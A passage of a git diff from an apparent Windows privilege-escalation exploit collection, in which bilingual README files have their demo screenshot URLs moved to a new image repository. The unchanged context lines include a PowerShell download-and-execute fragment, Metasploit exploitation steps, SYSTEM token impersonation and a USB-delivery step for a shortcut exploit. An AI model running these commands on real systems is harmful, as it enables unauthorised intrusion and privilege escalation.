+![12](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-1701_win7_x86.gif) > x64 utilization Test Machine Windows Server 2008 R2 SP1 x64 -![13](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-1701_win2008_x64.gif) \ No newline at end of file +![13](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-1701_win2008_x64.gif) \ No newline at end of file diff --git a/CVE-2015-2370/README.md b/CVE-2015-2370/README.md index 73b9cf2..a5d535d 100644 --- a/CVE-2015-2370/README.md +++ b/CVE-2015-2370/README.md @@ -36,7 +36,7 @@ Trebuchet.exe c:\Users\ascotbe\Desktop\test.txt c:\Windows\System32\test1.txt 演示机器Windows 7 SP1 x86 -![2](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-2370_win7_x86.png) +![2](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-2370_win7_x86.png) #### 分析文章 - http://bobao.360.cn/learning/detail/584.html diff --git a/CVE-2015-2370/README_EN.md b/CVE-2015-2370/README_EN.md index 2487a36..48905ef 100644 --- a/CVE-2015-2370/README_EN.md +++ b/CVE-2015-2370/README_EN.md 
@@ -36,7 +36,7 @@ Trebuchet.exe c:\Users\ascotbe\Desktop\test.txt c:\Windows\System32\test1.txt Demonstrate Machine Windows 7 SP1 x86 -![2](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-2370_win7_x86.png) +![2](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-2370_win7_x86.png) #### Analyze - http://bobao.360.cn/learning/detail/584.html diff --git a/CVE-2015-2387/README.md b/CVE-2015-2387/README.md index cb3ac83..43ab3c2 100644 --- a/CVE-2015-2387/README.md +++ b/CVE-2015-2387/README.md @@ -31,5 +31,5 @@ Adobe Type Manager字体驱动程序中的ATMFD.DLL允许本地用户通过精 演示系统Windows Server 2003 SP2 x86 -![3](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-2387_win2003_sp2_x86.gif) +![3](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-2387_win2003_sp2_x86.gif) diff --git a/CVE-2015-2387/README_EN.md b/CVE-2015-2387/README_EN.md index e744f5e..0129d29 100644 --- a/CVE-2015-2387/README_EN.md +++ b/CVE-2015-2387/README_EN.md @@ -32,5 +32,5 @@ Currently compiled only the `CVE-2015-2387_X86` project,`CVE-2015-2387_X64` pr Demo System Windows Server 2003 SP2 x86 -![3](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-2387_win2003_sp2_x86.gif) +![3](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-2387_win2003_sp2_x86.gif) diff --git a/CVE-2015-2546/README.md b/CVE-2015-2546/README.md index b75a4d3..f9af3df 100644 --- a/CVE-2015-2546/README.md +++ b/CVE-2015-2546/README.md @@ -28,7 +28,7 @@ 测试机器Windows 7 SP1 x86,当前只有x86版本的EXP,测试GIF图 -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-2546_win7_x86.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-2546_win7_x86.gif) #### 分析文章 - http://drops.xmd5.com/static/drops/papers-9276.html diff --git a/CVE-2015-2546/README_EN.md b/CVE-2015-2546/README_EN.md index 2de83b1..57b6ed5 100644 --- a/CVE-2015-2546/README_EN.md +++ b/CVE-2015-2546/README_EN.md 
@@ -29,7 +29,7 @@ CompilerEnvironment Test Machine Windows 7 SP1 X86, current only X86 version of Exp, test GIF map -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-2546_win7_x86.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-2546_win7_x86.gif) #### Analyze - http://drops.xmd5.com/static/drops/papers-9276.html diff --git a/CVE-2016-0041/README.md b/CVE-2016-0041/README.md index 725b930..5d50dee 100644 --- a/CVE-2016-0041/README.md +++ b/CVE-2016-0041/README.md @@ -35,7 +35,7 @@ run 可以看到如下的反弹shell -![CVE-2016-0041_win7_sp1_x64_01](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-0041_win7_sp1_x64_01.png) +![CVE-2016-0041_win7_sp1_x64_01](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-0041_win7_sp1_x64_01.png) 接着使用提权漏洞 @@ -45,6 +45,6 @@ set session 2#你当前的session run ``` -![CVE-2016-0041_win7_sp1_x64_02](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-0041_win7_sp1_x64_02.png) +![CVE-2016-0041_win7_sp1_x64_02](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-0041_win7_sp1_x64_02.png) 可以看到我们最后成为了SYSTEM权限 \ No newline at end of file diff --git a/CVE-2016-0041/README_EN.md b/CVE-2016-0041/README_EN.md index 256e353..cb30932 100644 --- a/CVE-2016-0041/README_EN.md +++ b/CVE-2016-0041/README_EN.md @@ -36,7 +36,7 @@ run You can see the following rebound shell -![CVE-2016-0041_win7_sp1_x64_01](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-0041_win7_sp1_x64_01.png) +![CVE-2016-0041_win7_sp1_x64_01](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-0041_win7_sp1_x64_01.png) Then use the rights vulnerability 
@@ -46,6 +46,6 @@ set session 2#你当前的session run ``` -![CVE-2016-0041_win7_sp1_x64_02](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-0041_win7_sp1_x64_02.png) +![CVE-2016-0041_win7_sp1_x64_02](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-0041_win7_sp1_x64_02.png) You can see that we finally became SYSTEM permissions. \ No newline at end of file diff --git a/CVE-2016-0051/README.md b/CVE-2016-0051/README.md index c26cc72..633f60f 100644 --- a/CVE-2016-0051/README.md +++ b/CVE-2016-0051/README.md @@ -27,5 +27,5 @@ 测试机器Windows 7 SP1 x86。需要把**CVE-2016-0051_x86.zip**解压后的两个文件放到目标中 -![8](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-0051_win7_x86.gif) +![8](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-0051_win7_x86.gif) diff --git a/CVE-2016-0051/README_EN.md b/CVE-2016-0051/README_EN.md index 77f0cbb..8b72a94 100644 --- a/CVE-2016-0051/README_EN.md +++ b/CVE-2016-0051/README_EN.md @@ -27,5 +27,5 @@ CompilerEnvironment Test Machine Windows 7 SP1 x86. Need to decompress the two files after the **CVE-2016-0051_X86.zip** is placed in the target -![8](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-0051_win7_x86.gif) +![8](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-0051_win7_x86.gif) diff --git a/CVE-2016-0095/README.md b/CVE-2016-0095/README.md index 68be6dd..55f1227 100644 --- a/CVE-2016-0095/README.md +++ b/CVE-2016-0095/README.md @@ -25,7 +25,7 @@ 测试Windows 7 SP1 x64的GIF图 -![5](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-0095_win7_x64.gif) +![5](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-0095_win7_x64.gif) #### 分析文章 - https://xz.aliyun.com/t/6008 diff --git a/CVE-2016-0095/README_EN.md b/CVE-2016-0095/README_EN.md index 98b5249..7523785 100644 --- a/CVE-2016-0095/README_EN.md +++ b/CVE-2016-0095/README_EN.md 
@@ -25,7 +25,7 @@ The X64 version in the project is perfect for Windows 7 SP1 X64 and Windows Serv Test the GIF map of Windows 7 SP1 X64 -![5](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-0095_win7_x64.gif) +![5](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-0095_win7_x64.gif) #### Analyze - https://xz.aliyun.com/t/6008 diff --git a/CVE-2016-0099/README.md b/CVE-2016-0099/README.md index a291e56..4c4ff30 100644 --- a/CVE-2016-0099/README.md +++ b/CVE-2016-0099/README.md @@ -38,9 +38,9 @@ powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(' GIF图如下 -![6](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-0099_win2008_x64_ps.gif) +![6](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-0099_win2008_x64_ps.gif) 利用exe文件测试通杀x64和x86的所有版本,这边只录制Windows 7 SP1 x64版本的 -![7](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-0099_win7_x64.gif) +![7](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-0099_win7_x64.gif) diff --git a/CVE-2016-0099/README_EN.md b/CVE-2016-0099/README_EN.md index f91b76f..774a577 100644 --- a/CVE-2016-0099/README_EN.md +++ b/CVE-2016-0099/README_EN.md @@ -38,9 +38,9 @@ powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(' GIF map is as follows -![6](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-0099_win2008_x64_ps.gif) +![6](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-0099_win2008_x64_ps.gif) Test all the versions of X64 and X86 using the EXE file, which only records Windows 7 SP1 X64 version -![7](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-0099_win7_x64.gif) +![7](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-0099_win7_x64.gif) diff --git a/CVE-2016-3225/README.md b/CVE-2016-3225/README.md index e83563b..41d616f 100644 --- a/CVE-2016-3225/README.md +++ b/CVE-2016-3225/README.md 
@@ -31,7 +31,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3225 Windows 7 SP1 x64测试中,使用`whoami /priv`命令查看发现并无**SeImpersonatePrivilege**特权烂土豆提权需要该特权为开启状态,所以测试的时候直接用管理员权限运行 -![image-20200819140202765](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-3225_win7_x64.png) +![image-20200819140202765](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-3225_win7_x64.png) 利用MSF+烂土豆提权,首先我们假定机器已经上线,通过msf中自带的插件来识别当前系统中可以利用的EXP来进行提权 @@ -43,11 +43,11 @@ run 如果没有用管理员权限运行MSF生成的exe的话,脚本检测是这样的 -![image-20200819112155945](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-3225_win7_x64_msf_1.png) +![image-20200819112155945](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-3225_win7_x64_msf_1.png) 如果使用管理员权限运行的话检测是这样的,可以看到比上面多了个ms16_075 -![image-20200819140819782](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-3225_win7_x64_msf_2.png) +![image-20200819140819782](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-3225_win7_x64_msf_2.png) 编译好烂土豆的文件 @@ -71,11 +71,11 @@ list_tokens -u #列出目标主机用户的可用令牌 impersonate_token "NT AUTHORITY\SYSTEM"#假冒目标主机上的可用令牌 ``` -![image-20200819141240274](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-3225_win7_x64_msf_3.png) +![image-20200819141240274](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-3225_win7_x64_msf_3.png) 进入shell查看 -![image-20200819141337651](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-3225_win7_x64_msf_4.png) +![image-20200819141337651](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-3225_win7_x64_msf_4.png) > 第二种利用方式 @@ -85,5 +85,5 @@ impersonate_token "NT AUTHORITY\SYSTEM"#假冒目标主机上的可用令牌 由于普通账号没有**SeImpersonatePrivilege**特权,这边用管理员账号来演示,利用程序**potatoNG.exe**直接上GIF图 -![4](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-3225_win7_x64.gif) +![4](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-3225_win7_x64.gif) 
diff --git a/CVE-2016-3225/README_EN.md b/CVE-2016-3225/README_EN.md index 07666b1..67aac71 100644 --- a/CVE-2016-3225/README_EN.md +++ b/CVE-2016-3225/README_EN.md @@ -32,7 +32,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3225 Windows 7 SP1 x64测试中,use `whoami /priv` Command View Discovery None **SeiMpersonateprivilege** Privilege Potato Right requires this privilege to turn on, so use administrator privileges when testing -![image-20200819140202765](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-3225_win7_x64.png) +![image-20200819140202765](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-3225_win7_x64.png) Use MSF + rotten potatoes,First we assume that the machine has been launched, through the plugins from the MSF to identify the EXP you can take advantage of the current system to carry out rights @@ -44,11 +44,11 @@ run If you do not run the MSF generated EXE, the script test is like this. -![image-20200819112155945](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-3225_win7_x64_msf_1.png) +![image-20200819112155945](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-3225_win7_x64_msf_1.png) If you use the administrator privilege to run, you can see more than the above MS16_075. -![image-20200819140819782](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-3225_win7_x64_msf_2.png) +![image-20200819140819782](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-3225_win7_x64_msf_2.png) Compiling the files of bad potatoes 
@@ -72,11 +72,11 @@ list_tokens -u #列出目标主机用户的可用令牌 impersonate_token "NT AUTHORITY\SYSTEM"#假冒目标主机上的可用令牌 ``` -![image-20200819141240274](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-3225_win7_x64_msf_3.png) +![image-20200819141240274](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-3225_win7_x64_msf_3.png) Enter the Shell View -![image-20200819141337651](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-3225_win7_x64_msf_4.png) +![image-20200819141337651](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-3225_win7_x64_msf_4.png) > Second utilization @@ -86,5 +86,5 @@ CompilerEnvironment Since there is no **Seimpersonateprivilege** privilege, this is demonstrated by the administrator account, using the program **potatoNG.exe** directly GIF map -![4](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-3225_win7_x64.gif) +![4](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-3225_win7_x64.gif) diff --git a/CVE-2016-3371/README.md b/CVE-2016-3371/README.md index a704765..5523765 100644 --- a/CVE-2016-3371/README.md +++ b/CVE-2016-3371/README.md @@ -30,7 +30,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3371 测试系统Windows 8.1 x64 -![4](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-3371_win_8.1_x64.gif) +![4](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-3371_win_8.1_x64.gif) #### 项目来源 diff --git a/CVE-2016-3371/README_EN.md b/CVE-2016-3371/README_EN.md index 0d50420..8d17768 100644 --- a/CVE-2016-3371/README_EN.md +++ b/CVE-2016-3371/README_EN.md @@ -31,7 +31,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3371 Test system Windows 8.1 x64 -![4](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-3371_win_8.1_x64.gif) +![4](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-3371_win_8.1_x64.gif) #### ProjectSource 
diff --git a/CVE-2016-7255/README.md b/CVE-2016-7255/README.md index 6150a3d..dadffd7 100644 --- a/CVE-2016-7255/README.md +++ b/CVE-2016-7255/README.md @@ -37,7 +37,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-7255 通过ps脚本进行演示,直接上GIF图 -![3](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-7255_win7_x86.gif) +![3](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-7255_win7_x86.gif) #### 分析文章 - https://www.anquanke.com/post/id/85232 \ No newline at end of file diff --git a/CVE-2016-7255/README_EN.md b/CVE-2016-7255/README_EN.md index 07f6c22..353f9ec 100644 --- a/CVE-2016-7255/README_EN.md +++ b/CVE-2016-7255/README_EN.md @@ -37,7 +37,7 @@ This vulnerability kills all affected system X64 versions, three Exp can be used Demo through the PS script, directly on the GIF map -![3](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-7255_win7_x86.gif) +![3](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-7255_win7_x86.gif) #### Analyze - https://www.anquanke.com/post/id/85232 \ No newline at end of file diff --git a/CVE-2017-0101/README.md b/CVE-2017-0101/README.md index 7a4a3c1..54ba117 100644 --- a/CVE-2017-0101/README.md +++ b/CVE-2017-0101/README.md @@ -26,7 +26,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0101 测试Windows 7 SP1 x86通过,直接上GIF图 -![2](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2017-0101_win7_x86.gif) +![2](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2017-0101_win7_x86.gif) #### 分析文章 - https://paper.seebug.org/586/ diff --git a/CVE-2017-0101/README_EN.md b/CVE-2017-0101/README_EN.md index 8f14cb4..1f7a617 100644 --- a/CVE-2017-0101/README_EN.md +++ b/CVE-2017-0101/README_EN.md 
@@ -27,7 +27,7 @@ CompilerEnvironment Test Windows 7 SP1 X86 pass, directly on GIF map -![2](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2017-0101_win7_x86.gif) +![2](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2017-0101_win7_x86.gif) #### Analyze - https://paper.seebug.org/586/ diff --git a/CVE-2017-0143/README.md b/CVE-2017-0143/README.md index 96b1ee2..e3ca89e 100644 --- a/CVE-2017-0143/README.md +++ b/CVE-2017-0143/README.md @@ -37,11 +37,11 @@ set RHOSTS 192.168.0.128 run ``` -![image-20200818114043309](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2017-0143_msf_1.png) +![image-20200818114043309](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2017-0143_msf_1.png) 并且权限是system的 -![image-20200818114925926](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2017-0143_msf_2.png) +![image-20200818114925926](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2017-0143_msf_2.png) #### 分析文章 diff --git a/CVE-2017-0143/README_EN.md b/CVE-2017-0143/README_EN.md index a4b8354..0a057eb 100644 --- a/CVE-2017-0143/README_EN.md +++ b/CVE-2017-0143/README_EN.md @@ -38,11 +38,11 @@ set RHOSTS 192.168.0.128 run ``` -![image-20200818114043309](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2017-0143_msf_1.png) +![image-20200818114043309](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2017-0143_msf_1.png) And the permissions are SYSTEM -![image-20200818114925926](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2017-0143_msf_2.png) +![image-20200818114925926](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2017-0143_msf_2.png) #### Analyze diff --git a/CVE-2017-0213/README.md b/CVE-2017-0213/README.md index 1c2d314..c1498a5 100644 --- a/CVE-2017-0213/README.md +++ b/CVE-2017-0213/README.md 
@@ -36,7 +36,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0213 测试环境Windows 7 SP1 x64 -![CVE-2017-0213_win7_x86](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2017-0213_win7_x86.gif) +![CVE-2017-0213_win7_x86](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2017-0213_win7_x86.gif) #### 分析文章 - https://cloud.tencent.com/developer/article/1045805 \ No newline at end of file diff --git a/CVE-2017-0213/README_EN.md b/CVE-2017-0213/README_EN.md index 14887d8..bedcc56 100644 --- a/CVE-2017-0213/README_EN.md +++ b/CVE-2017-0213/README_EN.md @@ -36,7 +36,7 @@ CompilerEnvironment Test environment Windows 7 SP1 x64 -![CVE-2017-0213_win7_x86](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2017-0213_win7_x86.gif) +![CVE-2017-0213_win7_x86](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2017-0213_win7_x86.gif) #### Analyze - https://cloud.tencent.com/developer/article/1045805 \ No newline at end of file diff --git a/CVE-2017-8464/README.md b/CVE-2017-8464/README.md index 3b71a4e..312eca8 100644 --- a/CVE-2017-8464/README.md +++ b/CVE-2017-8464/README.md @@ -41,7 +41,7 @@ run 生成文件 -![CVE-2017-8464_win7_x86_msf](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2017-8464_win7_x86_msf.png) +![CVE-2017-8464_win7_x86_msf](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2017-8464_win7_x86_msf.png) 运行命令把它拷贝到test目录下 @@ -49,7 +49,7 @@ run cp -r /root/.msf4/local/ /root/test ``` -![CVE-2017-8464_win7_x86_msf2](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2017-8464_win7_x86_msf2.png) +![CVE-2017-8464_win7_x86_msf2](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2017-8464_win7_x86_msf2.png) 接着把这些文件全部拷贝到U盘中,然后插上电脑即可 
@@ -61,7 +61,7 @@ https://github.com/Ascotbe/WinKernelhub/tree/master/Patch GIF图如下 -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2017-8464_win7_x86.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2017-8464_win7_x86.gif) #### 分析文章 - https://my.oschina.net/u/4310658/blog/3695267 diff --git a/CVE-2017-8464/README_EN.md b/CVE-2017-8464/README_EN.md index e853fbe..72b5154 100644 --- a/CVE-2017-8464/README_EN.md +++ b/CVE-2017-8464/README_EN.md @@ -42,7 +42,7 @@ run Generate files -![CVE-2017-8464_win7_x86_msf](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2017-8464_win7_x86_msf.png) +![CVE-2017-8464_win7_x86_msf](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2017-8464_win7_x86_msf.png) Run the command to copy it into the test directory @@ -50,7 +50,7 @@ Run the command to copy it into the test directory cp -r /root/.msf4/local/ /root/test ``` -![CVE-2017-8464_win7_x86_msf2](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2017-8464_win7_x86_msf2.png) +![CVE-2017-8464_win7_x86_msf2](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2017-8464_win7_x86_msf2.png) Then copy all of these files to the U disk, then plug in the computer. @@ -62,7 +62,7 @@ https://github.com/Ascotbe/WinKernelhub/tree/master/Patch GIF map is as follows -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2017-8464_win7_x86.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2017-8464_win7_x86.gif) #### Analyze - https://my.oschina.net/u/4310658/blog/3695267 diff --git a/CVE-2018-0833/README.md b/CVE-2018-0833/README.md index 00c32b3..ba1a6ab 100644 --- a/CVE-2018-0833/README.md +++ b/CVE-2018-0833/README.md 
@@ -26,7 +26,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0833 效果图如下 -![CVE](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2018-0833.gif) +![CVE](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2018-0833.gif) #### 分析文章 - https://de4dcr0w.github.io/cve%E6%BC%8F%E6%B4%9E/SMBv3%E6%97%A0%E6%95%88%E6%8C%87%E9%92%88%E5%BC%95%E7%94%A8%E6%BC%8F%E6%B4%9E(CVE-2018-0833).html diff --git a/CVE-2018-0833/README_EN.md b/CVE-2018-0833/README_EN.md index fdd85bd..c8708a3 100644 --- a/CVE-2018-0833/README_EN.md +++ b/CVE-2018-0833/README_EN.md @@ -27,7 +27,7 @@ First, use a machine (test Used Kali) to run the Python script in the project, t The effect picture is as follows -![CVE](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2018-0833.gif) +![CVE](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2018-0833.gif) #### Analyze - https://de4dcr0w.github.io/cve%E6%BC%8F%E6%B4%9E/SMBv3%E6%97%A0%E6%95%88%E6%8C%87%E9%92%88%E5%BC%95%E7%94%A8%E6%BC%8F%E6%B4%9E(CVE-2018-0833).html diff --git a/CVE-2018-8120/README.md b/CVE-2018-8120/README.md index 7386493..31eeeed 100644 --- a/CVE-2018-8120/README.md +++ b/CVE-2018-8120/README.md @@ -27,7 +27,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120 当前测试系统Windows 7 SP1 x64 -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2018-8120_win7_x64.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2018-8120_win7_x64.gif) #### 分析文章 - https://github.com/EVOL4/CVE-2018-8120/blob/master/CVE-2018-8120.md diff --git a/CVE-2018-8120/README_EN.md b/CVE-2018-8120/README_EN.md index b63e599..b9164b8 100644 --- a/CVE-2018-8120/README_EN.md +++ b/CVE-2018-8120/README_EN.md 
@@ -27,7 +27,7 @@ CompilerEnvironment Test system Windows 7 SP1 x64 -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2018-8120_win7_x64.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2018-8120_win7_x64.gif) #### Analyze - https://github.com/EVOL4/CVE-2018-8120/blob/master/CVE-2018-8120.md diff --git a/CVE-2018-8453/README.md b/CVE-2018-8453/README.md index 62f2ea5..ef7ede7 100644 --- a/CVE-2018-8453/README.md +++ b/CVE-2018-8453/README.md @@ -40,7 +40,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8453 测试系统Windows 10 1709 x64 -![CVE-2018-8453](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2018-8453_win10_1709_x64.gif) +![CVE-2018-8453](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2018-8453_win10_1709_x64.gif) #### 分析文章 - https://github.com/thepwnrip/leHACK-Analysis-of-CVE-2018-8453 diff --git a/CVE-2018-8453/README_EN.md b/CVE-2018-8453/README_EN.md index b643a84..73cdb13 100644 --- a/CVE-2018-8453/README_EN.md +++ b/CVE-2018-8453/README_EN.md @@ -40,7 +40,7 @@ CompilerEnvironment Test system Windows 10 1709 x64 -![CVE-2018-8453](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2018-8453_win10_1709_x64.gif) +![CVE-2018-8453](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2018-8453_win10_1709_x64.gif) #### Analyze - https://github.com/thepwnrip/leHACK-Analysis-of-CVE-2018-8453 diff --git a/CVE-2018-8639/README.md b/CVE-2018-8639/README.md index d56e930..73f94e6 100644 --- a/CVE-2018-8639/README.md +++ b/CVE-2018-8639/README.md @@ -40,7 +40,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8639 在Windows 2008 R2 SP1 X64上测试通过的EXP,直接上GIF图 -![2](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2018-8639_win2008_r2_sp1_x64.gif) +![2](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2018-8639_win2008_r2_sp1_x64.gif) 
@@ -54,7 +54,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8639 Windows 7 SP1 X64测试通过的EXP,上GIF图 -![3](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2018-8639_win7_sp1_x64.gif) +![3](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2018-8639_win7_sp1_x64.gif) #### 分析文章 - https://www.anquanke.com/post/id/183358 diff --git a/CVE-2018-8639/README_EN.md b/CVE-2018-8639/README_EN.md index d02825e..cc6046e 100644 --- a/CVE-2018-8639/README_EN.md +++ b/CVE-2018-8639/README_EN.md @@ -40,7 +40,7 @@ CompilerEnvironment Windows 2008 R2 SP1 X64 test passed EXP, directly on GIF map -![2](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2018-8639_win2008_r2_sp1_x64.gif) +![2](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2018-8639_win2008_r2_sp1_x64.gif) @@ -54,7 +54,7 @@ CompilerEnvironment Windows 7 SP1 X64 test via EXP, on GIF map -![3](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2018-8639_win7_sp1_x64.gif) +![3](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2018-8639_win7_sp1_x64.gif) #### Analyze - https://www.anquanke.com/post/id/183358 diff --git a/CVE-2019-0623/README.md b/CVE-2019-0623/README.md index d85d708..b9664e9 100644 --- a/CVE-2019-0623/README.md +++ b/CVE-2019-0623/README.md @@ -38,7 +38,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0623 